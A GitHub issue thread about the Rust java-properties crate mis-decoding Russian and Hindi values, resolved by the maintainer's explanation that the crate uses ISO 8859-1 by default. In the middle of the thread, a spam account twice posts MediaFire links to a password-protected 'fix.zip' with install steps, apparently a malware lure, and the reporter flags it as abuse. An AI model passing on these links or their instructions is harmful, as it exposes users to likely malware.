### ISSUE TITLE
Fails on Russian & Hindi

### ISSUE THREAD

**Issue by wcarmon** [adamcrume/java-properties#11]
Please help me understand how to handle languages like Russian and Hindi

```rust
    #[test]
    fn fails_on_russian() {
        let content = "str.russian = Здравствуйте";
        let p = java_properties::read(content.as_bytes())
            .unwrap();

        assert_eq!("Здравствуйте", p.get("str.russian").unwrap());
    }
```

# Failure message:

```
thread 'tests::fails_on_russian' panicked at src/main.rs:35:9:
assertion `left == right` failed
  left: "Здравствуйте"
 right: "Ð—Ð´Ñ€Ð°Ð²Ñ\u{81}Ñ‚Ð²ÑƒÐ¹Ñ‚Ðµ"
```

a similar thing happens in Hindi
```rust
        let content = "str.hindi = फैला हुआ";
        let p = java_properties::read(content.as_bytes())
            .unwrap();

        assert_eq!("फैला हुआ", p.get("str.hindi").unwrap());
```

Both work in java 21+

```java
        Properties p;

        String s1 = """
                str.hindi = फैला हुआ""";

        p = new Properties();
        p.load(new StringReader(s1));
        if (!"फैला हुआ".equals(p.get("str.hindi"))) {
            throw new RuntimeException("failed on Hindi");
        }

        String s2 = """
                str.russian = Здравствуйте
                """;

        p = new Properties();
        p.load(new StringReader(s1));
        if (!"Здравствуйте".equals(p.get("str.russian"))) {
            throw new RuntimeException("failed on Russian");
        }

```

**Comment by wcarmon** [comment]
Hm... this seems to work

```rust
        let mut p = PropertiesIter::new_with_encoding(
            content.as_bytes(), encoding_rs::UTF_8);

        let mut map = HashMap::new();
        p.read_into(|k, v| {
            map.insert(k, v);
        })?;
```

Please advise if there's a better way.

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wcarmon** [comment]
@adamcrume can you report abuse for the comment by [mohamed-elsankary](https://github.com/mohamed-elsankary)

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by adamcrume** [comment]
This library follows the Java behavior (https://docs.oracle.com/en/java/javase/21/docs/api/java.base/java/util/Properties.html) which requires the ISO 8859-1 encoding.  This was an unfortunate choice by the Java library, especially since Java supported Unicode from the start, but this Rust version follows the Java behavior verbatim by default for maximum compatibility.  UTF-8 must be specifically requested if you want to use that encoding.

**Comment by wcarmon** [comment]
Sounds reasonable.

Thanks for excellent software and a quick response.
